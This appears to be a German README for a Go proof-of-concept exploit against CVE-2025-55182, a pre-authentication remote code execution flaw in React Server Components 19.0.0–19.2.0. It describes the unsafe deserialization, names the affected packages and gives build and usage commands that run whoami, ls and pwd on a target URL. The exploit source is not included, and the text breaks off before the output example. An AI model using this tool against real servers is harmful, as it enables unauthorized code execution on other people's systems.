
Exploit-Code für die React2Shell-RCE-Sicherheitslücke (CVE-2025-55182), die React Server Components 19.0.0–19.2.0 betrifft. Nutzt unsichere Deserialisierung für nicht authentifizierte entfernte Codeausführung aus.
Proof of Concept (PoC) für React Server Components (RSC) / Next.js Remote Code Execution-Schwachstelle.
Eine vor der Authentifizierung ausnutzbare Schwachstelle zur Remote-Code-Ausführung besteht in React Server Components Versionen 19.0.0, 19.1.0, 19.1.1 und 19.2.0, einschließlich der folgenden Pakete: react-server-dom-parcel, react-server-dom-turbopack und react-server-dom-webpack. Der anfällige Code deserialisiert unsicher Nutzdaten aus HTTP-Anfragen an Server-Function-Endpunkte.
⚠️ WARNUNG: Dieses Tool ist nur für autorisierte Sicherheitstests.
go build -o exploit exploit.go
Oder direkt ausführen:
go run exploit.go
./exploit -u <URL> -c <command>
-u - Ziel-URL (erforderlich)-c - Auszuführender Befehl (Standard: id)# Grundlegende Verwendung
./exploit -u https://vulnerable -c "whoami"
# Anderen Befehl ausführen
./exploit -u https://vulnerable -c "ls -la"
# Direkt mit Go ausführen
go run exploit.go -u https://vulnerable -c "pwd"

Das Tool gibt aus: